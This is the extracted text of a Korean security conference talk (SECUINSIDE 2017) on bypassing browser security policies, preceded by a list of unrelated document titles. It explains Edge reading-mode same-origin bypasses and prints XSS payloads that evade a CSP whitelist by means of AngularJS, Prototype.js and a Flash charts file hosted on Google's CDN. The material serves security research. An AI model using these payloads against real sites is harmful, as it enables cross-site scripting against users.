PowerPoint 프레젠테이션

Similar documents
HTML5가 웹 환경에 미치는 영향 고 있어 웹 플랫폼 환경과는 차이가 있다. HTML5는 기존 HTML 기반 웹 브라우저와의 호환성을 유지하면서도, 구조적인 마크업(mark-up) 및 편리한 웹 폼(web form) 기능을 제공하고, 리치웹 애플리케이 션(RIA)을

<C0CCBCBCBFB52DC1A4B4EBBFF82DBCAEBBE7B3EDB9AE2D D382E687770>

PowerPoint Presentation

1217 WebTrafMon II

Voice Portal using Oracle 9i AS Wireless

UDP Flooding Attack 공격과 방어

쉽게 풀어쓴 C 프로그래밍

Building Mobile AR Web Applications in HTML5 - Google IO 2012

Week8-Extra

CD-RW_Advanced.PDF

Week13

제20회_해킹방지워크샵_(이재석)

대학교육151호-합침

3장

접근성과 웹 The power of the Web is in its universality. Access by everyone regardless of disability is an essential aspect. Tim Berners-Lee, the inventor

FileMaker 15 WebDirect 설명서

Web Application Hosting in the AWS Cloud Contents 개요 가용성과 확장성이 높은 웹 호스팅은 복잡하고 비용이 많이 드는 사업이 될 수 있습니다. 전통적인 웹 확장 아키텍처는 높은 수준의 안정성을 보장하기 위해 복잡한 솔루션으로 구현

4? [The Fourth Industrial Revolution] IT :,,,. : (AI), ,, 2, 4 3, : 4 3.

KYO_SCCD.PDF

Interstage5 SOAP서비스 설정 가이드

Javascript.pages

PWR PWR HDD HDD USB USB Quick Network Setup Guide xdsl/cable Modem PC DVR 1~3 1.. DVR DVR IP xdsl Cable xdsl Cable PC PC DDNS (

LXR 설치 및 사용법.doc

Microsoft PowerPoint - 2.Catalyst Switch Intrastructure Protection_이충용_V1 0.ppt [호환 모드]

Analytics > Log & Crash Search > Unity ios SDK [Deprecated] Log & Crash Unity ios SDK. TOAST SDK. Log & Crash Unity SDK Log & Crash Search. Log & Cras

Secure Programming Lecture1 : Introduction

(Microsoft PowerPoint \277\243\305\315\307\301\266\363\300\314\301\356 \260\374\301\241\300\307 HTML5)

제목 레이아웃

슬라이드 1

API STORE 키발급및 API 사용가이드 Document Information 문서명 : API STORE 언어별 Client 사용가이드작성자 : 작성일 : 업무영역 : 버전 : 1 st Draft. 서브시스템 : 문서번호 : 단계 : Docum

MasoJava4_Dongbin.PDF

< FC1A4BAB8B9FDC7D D325FC3D6C1BEBABB2E687770>

XSS Attack - Real-World XSS Attacks, Chaining XSS and Other Attacks, Payloads for XSS Attacks

20주년용

final_thesis

PowerPoint 프레젠테이션

Lab1

<4D F736F F F696E74202D E20C0CEC5CDB3DD20C0C0BFEB20B9D720BCADBAF1BDBA20B1E2BCFA E >

HTML5* Web Development to the next level HTML5 ~= HTML + CSS + JS API

Microsoft PowerPoint - XP Style

HTTP 2.0 : The New Web Standard and Issue

TTA Journal No.157_서체변경.indd

BEef 사용법.pages

Dialog Box 실행파일을 Web에 포함시키는 방법

네트워크 안정성을 지켜줄 최고의 기술과 성능 TrusGuard는 국내 최초의 통합보안솔루션으로서 지난 5년간 약 4천여 고객 사이트에 구축 운영되면서 기술의 안정성과 성능면에서 철저한 시장 검증을 거쳤습니다. 또한 TrusGuard는 단독 기능 또는 복합 기능 구동 시

미쓰리 파워포인트

Microsoft PowerPoint - aj-lecture1-HTML-CSS-JS.ppt [호환 모드]

Jwplayer 요즘 웹에서 동영상 재생을 목적으로 많이 쓰이는 jwplayer의 설치와 사용하기 입니다. jwplayer홈페이지 : 위의 홈페이지에 가시면 JWplayer를 다운 받으실 수 있습니다. 현재 5.1버전

슬라이드 1

6강.hwp

210_01

Syrup Store O2O Marketing Platform/Solution

Overall Process


Cache_cny.ppt [읽기 전용]


playnode.key

thesis-shk

Orcad Capture 9.x

슬라이드 1

1

Special Theme _ 모바일웹과 스마트폰 본 고에서는 모바일웹에서의 단말 API인 W3C DAP (Device API and Policy) 의 표준 개발 현황에 대해서 살펴보고 관 련하여 개발 중인 사례를 통하여 이해를 돕고자 한다. 2. 웹 애플리케이션과 네이

hwp

USB USB DV25 DV25 REC SRN-475S REC SRN-475S LAN POWER LAN POWER Quick Network Setup Guide xdsl/cable Modem PC DVR 1~3 1.. DVR DVR IP xdsl Cable xdsl C

서현수

chapter4

Analyst Briefing

C H A P T E R 2

Microsoft PowerPoint - web-part03-ch19-node.js기본.pptx

Network Security - Wired Sniffing 실습 ICNS Lab. Kyung Hee University

untitled

오브젝트 스토리지를 통한 검색의 신속 정확성 확보 HDS는 계속 증가하고 장기간 존속하는 고정 콘텐츠 관리를 위 해 실제 검증을 마친 수단으로서 오브젝트 스토리지 솔루션 에 주목하고 있다. 그 가장 기본적인 레벨로서 오브젝트 스토리지 기기는 오브젝트의 스토리지를 관리하

Ext JS À¥¾ÖÇø®ÄÉÀ̼ǰ³¹ß-³¹Àå.PDF

untitled

오늘날의 기업들은 24시간 365일 멈추지 않고 돌아간다. 그리고 이러한 기업들을 위해서 업무와 관련 된 중요한 문서들은 언제 어디서라도 항상 접근하여 활용이 가능해야 한다. 끊임없이 변화하는 기업들 의 경쟁 속에서 기업내의 중요 문서의 효율적인 관리와 활용 방안은 이

Output file

Webtob( 멀티도메인 ) SSL 인증서갱신설치가이드 본문서는주식회사한국기업보안에서 SSL 보안서버인증서설치를위해작성된문서로 주식회사한국기업보안의동의없이무단으로사용하실수없습니다. [ 고객센터 ] 한국기업보안. 유서트기술팀 Copyright 201

3ÆÄÆ®-14

iii. Design Tab 을 Click 하여 WindowBuilder 가자동으로생성한 GUI 프로그래밍환경을확인한다.

15_3oracle

<FEFF E002D B E E FC816B CBDFC1B558B202E6559E830EB C28D9>

DocsPin_Korean.pages

untitled

PRO1_09E [읽기 전용]

ibmdw_rest_v1.0.ppt

SK Telecom Platform NATE

SMB_ICMP_UDP(huichang).PDF

K7VT2_QIG_v3

untitled

Network seminar.key

IKC43_06.hwp

Multi Channel Analysis. Multi Channel Analytics :!! - (Ad network ) Report! -! -!. Valuepotion Multi Channel Analytics! (1) Install! (2) 3 (4 ~ 6 Page

목순 차서 v KM의 현황 v Web2.0 의 개념 v Web2.0의 도입 사례 v Web2.0의 KM 적용방안 v 고려사항 1/29

The Self-Managing Database : Automatic Health Monitoring and Alerting

Introduction to KoreaMed, Synapse, KAMJE Press and XMlink

Microsoft Word doc

199

snu.pdf

b

Transcription:

SECUINSIDE 2017 Bypassing Web Browser Security Policies DongHyun Kim (hackpupu) Security Researcher at i2sec Korea University Graduate School

Agenda - Me? - Abstract - What is HTTP Secure Header? - What is SOP(Same Origin Policy)? - SOP(Same Origin Policy) Bypass 1-Day - Details CSP(Content-Security-Policy) - CSP Bypass (Whitelist) - Conclusion

Me? - 김동현 (hackpupu) - 1995.02.13 - researcher@(c)i2sec - CTF, Web Hacking, Pentester - Scuba Diving, Sea - http://fb.com/hackpupu - http://hackpupu.github.io

Abstract Browser Hacking 중 Secure Header 에관한취약점을소개한다.

What is HTTP Secure Header? 어떠한 Response Header 가 Client Browser 에영향을줄수있는가? 옵션기능 Example Content-Security-Policy XSS 공격방지, 허용된 URL 에서만 Static Resource 허용 Content-Security-Policy: script-src self https://apis.google.com X-Frame-Options FRAME 을차단 / 설정된도메인만허용 X-Frame-Options: SAMDORIGIN or Deny or http://i2sec.co.kr/ X-Content-Type-Options MIME-Snffing 공격을차단 X-Content-Type-Options: nosniff Strict-Transport-Security HTTPS 로강제고정해연결 (MITM 공격차단 ) Strict-Transport-Security: max-age=1607400; includesubdomains Public-Key-Pins 인증서 PIN 을비교후연결 ( 위조된인증서확인 ) Public-Key-Pins: pin-sha256= <sha256> ; pin-sha256= <sha256> max-age= 15768000; includesubdomains X-XSS-Protection 브라우저의 XSS 필터를활성화 X-XSS-Protection: 1; mode-block

What is HTTP Secure Header? Github Response Header Example

What is SOP(Same Origin Policy)? Same Origin Policy Details - Example Example: http://seoul.i2sec.co.kr/index.html URL 결과 이유 http://seoul.i2sec.co.kr/secuinside/test.html 성공 http://seoul.i2sec.co.kr/education/main.html 성공 https://seoul.i2sec.co.kr/secure.html 실패 프로토콜상이 http://seoul.i2sec.co.kr:8080/etc.html 실패 포트상이 http://busan.i2sec.co.kr/etc.html 실패 호스트상이

What is SOP(Same Origin Policy)? Same Origin Policy Details - What is Origin? http:// seoul.i2sec.co.kr :8080 scheme hostname port Origin

What is SOP(Same Origin Policy)? Same Origin Policy Details - IE Except - Trust Zones: 두도메인이신뢰할수있는영역에속하면 SOP 가적용되지않는다. e.g., 기업도메인 (corporate domains) - Port: IE 는포트를비교하지않는다. http://seoul.i2sec.co.kr:8080/index.html = http://seoul.i2sec.co.kr:80/index.html

What is SOP(Same Origin Policy)? Same Origin Policy Details - Inherited origins - about:blank, data: 또는 javascript: 와같은 URL 에서는 URL 자체가원본에대한정보를제공하지않기에, 위 URL 을호출한문서의정책을상속한다. http://seoul.i2sec.co.kr about:blank Origin: seoul.i2sec.co.kr data: javascript:

What is SOP(Same Origin Policy)? Edge Browser SOP Bypass Using Reading Mode - ALL Source Code In hackpupu github - https://github.com/hackpupu/papaer/2017/secuinside/demo_sop

SOP(Same Origin Policy) Bypass 1-Day Edge Browser SOP Bypass Using Reading Mode Read Mode ON

SOP(Same Origin Policy) Bypass 1-Day Edge Reading Mode - Details http://secuinside.org/2017/ctf.html Read Mode ON Original HTML Read Mode HTML

SOP(Same Origin Policy) Bypass 1-Day Edge Reading Mode - Details Read Mode ON Deleted Tags <script> <hr> <section> <footer> <li> <header> <nav> <article> <ul> Read Mode Deleted Tags (e.g, secuinside.org/2017/ctf.html)

SOP(Same Origin Policy) Bypass 1-Day Edge Reading Mode - Details http://secuinside.org/2017/ctf.html

SOP(Same Origin Policy) Bypass 1-Day Edge Reading Mode - Details read:http://secuinside.org/2017/ctf.html

SOP(Same Origin Policy) Bypass 1-Day Edge Reading Mode - Conclusion Edge CSS File is Internal File Using C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\Assets\ReadingView Edge Read mode Delete Tags(Script, Iframe, etc html tags ) Loading in the background, without the user knowing

SOP(Same Origin Policy) Bypass 1-Day Edge Reading Mode - Vulnerability#1 http://secuinside.org

SOP(Same Origin Policy) Bypass 1-Day Edge Reading Mode - Vulnerability#1 read:http://secuinside.org

SOP(Same Origin Policy) Bypass 1-Day Edge Reading Mode - Vulnerability#1 Finding Interesting Redirect URL

SOP(Same Origin Policy) Bypass 1-Day Edge Reading Mode - Vulnerability#1 Not Changed location.href and URL Bar

SOP(Same Origin Policy) Bypass 1-Day Edge Reading Mode - Vulnerability#2 Object Tag Write Available <object data="http://www.i2sec.co.kr/secuinside/data.js"></object> http://www.i2sec.co.kr/secuinside/data.js

SOP(Same Origin Policy) Bypass 1-Day Edge Reading Mode - Vulnerability#3 document.write data, top location using! <object data="http://www.i2sec.co.kr/secuinside/data.js "></object> http://www.i2sec.co.kr/secuinside/data.js

SOP(Same Origin Policy) Bypass 1-Day Edge Reading Mode - Vulnerability Conclusion Using Edge Read Mode Redirect, Not Change URL Bar and location.href value Edge Read Mode not deleted object tag Edge Read Mode document.write

SOP(Same Origin Policy) Bypass 1-Day Edge Reading Mode - Demo SOP Bypass 1-Day DEMO

CSP(Content-Security-Policy) Details CSP Options Content-Security-Policy: script-src 'self' https://apis.google.com Access-Allow Resource Type Another Domain Origin (Using Domain)

CSP(Content-Security-Policy) Details CSP Options - Access-Allow Resource Type 옵션기능 Example Domain base-uri <base> 태그에나타낼수있는 URL 을제한 child-src Frame 태그에나타낼수있는 URL 을제한 child-src https://youtube.com connect-src XHR, WebSocket 또는 EventSource 를통해연결하는출처를제한 font-src 웹폰트를제공할수있는출처를제한 font-src https://themes.googleusercontent.com form-action img-src media-src <form> 태그내 action 의 Endpoint 를제한 이미지를로드할수있는출처를제한 동영상및오디오를로드할수있는출처를제한 style-src 스타일시트 (CSS) 를로드할수있는출처를제한 style-src https://www.bootstrapcdn.com/

CSP(Content-Security-Policy) Details CSP Options - Another Tip - Content Security Policy (CSP) block eval method call - CSP is block using eval() for Javascript - CSP does not specify unsafe-inline, the inline event handler is blocked

CSP(Content-Security-Policy) Details Why Attacker Thinking CSP? Drive By Download Attack hacker_site/hack.js Victim Site Include(hacker_site/hack.js) User Browser

CSP(Content-Security-Policy) Details Why Attacker Thinking CSP? - Enable CSP Drive By Download Attack hacker_site/hack.js Victim Site Include(hacker_site/hack.js) User Browser

CSP(Bypass) Bypass CSP(Bypass) Example, Edge 0-Day and CSP WhiteListDomain - ALL Source Code In hackpupu github - https://github.com/hackpupu/papaer/2017/secuinside/demo_csp

CSP(Bypass) Edge Bypass application/pdf not filtering - Demo <embed type="application/pdf" src="http://www.africau.edu/images/default/sample.pdf" width="800" height="500">

CSP(Content-Security-Policy) Details CSP is Real Safe? Content-Security-Policy: script-src self ajax.googleapis.com

CSP Bypass (Whitelist) CSP bypass XSS Challenge https://github.com/cure53/xsschallengewiki/wiki/h5sc-minichallenge-3:- %22Sh*t,-it%27s-CSP!%22

CSP Bypass (Whitelist) CSP bypass Using AngularJS ng-csp Options ng-app"ng-csp ng-click=$event.view.alert(1337)><script src=//ajax.googleapis.com/ajax/libs/angularjs/1.0.8/angular.js></ script>

CSP Bypass (Whitelist) CSP bypass Using Google Externallinterface XSS "><embed src='//ajax.googleapis.com/ajax/libs/yui/2.8.0r4/build/charts/asse ts/charts.swf?alloweddomain=\"})))}catch(e){alert(1337)}//' allowscriptaccess=always>

CSP Bypass (Whitelist) CSP bypass Using AngularJS + Prototype.js "ng-app ng-csp><base href=//ajax.googleapis.com/ajax/libs/><script src=angularjs/1.0.1/angular.js></script><script src=prototype/1.7.2.0/prototype.js></script>{{$on.curry.call().aler t(1337

CSP Bypass (Whitelist) CSP bypass DEMO(ajax.googleapis.com)

Conclusion - 브라우저별보안헤더 / 정책을적용한방법은다다르다. - 헤더를안전하게적용했다고생각하지만취약점은존재한다! - SOP, CSP 등은재미나게우회할아이디어가많다. - 기능이새로추가되는 Third-Party 도보면참재미지다. - CDN과 AngularJS 샌드박스를 100% 신뢰하지말라

0-day IE11! from James Lee - ALL Source Code In hackpupu github - https://github.com/hackpupu/papaer/2017/secuinside/0_day

0-Day IE11! from James Lee MS IE11 Information Disclosure, Content Spoofing, etc https://ineedthinkpad.blogspot.kr/2017/05/msie11.html https://github.com/hackpupu/paper/2017/secuinside/demo/ie11

Thank you :) - Reference https://tools.ietf.org/html/rfc6797 https://developer.mozilla.org/en- US/docs/Web/Security/HTTP_strict_transport_security https://www.brokenbrowser.com/sop-bypass-abusing-read-protocol/ https://github.com/cure53/xsschallengewiki/wiki/h5sc- Minichallenge-3:-%22Sh*t,-it%27s-CSP!%22 https://ineedthinkpad.blogspot.kr/2017/05/msie11.html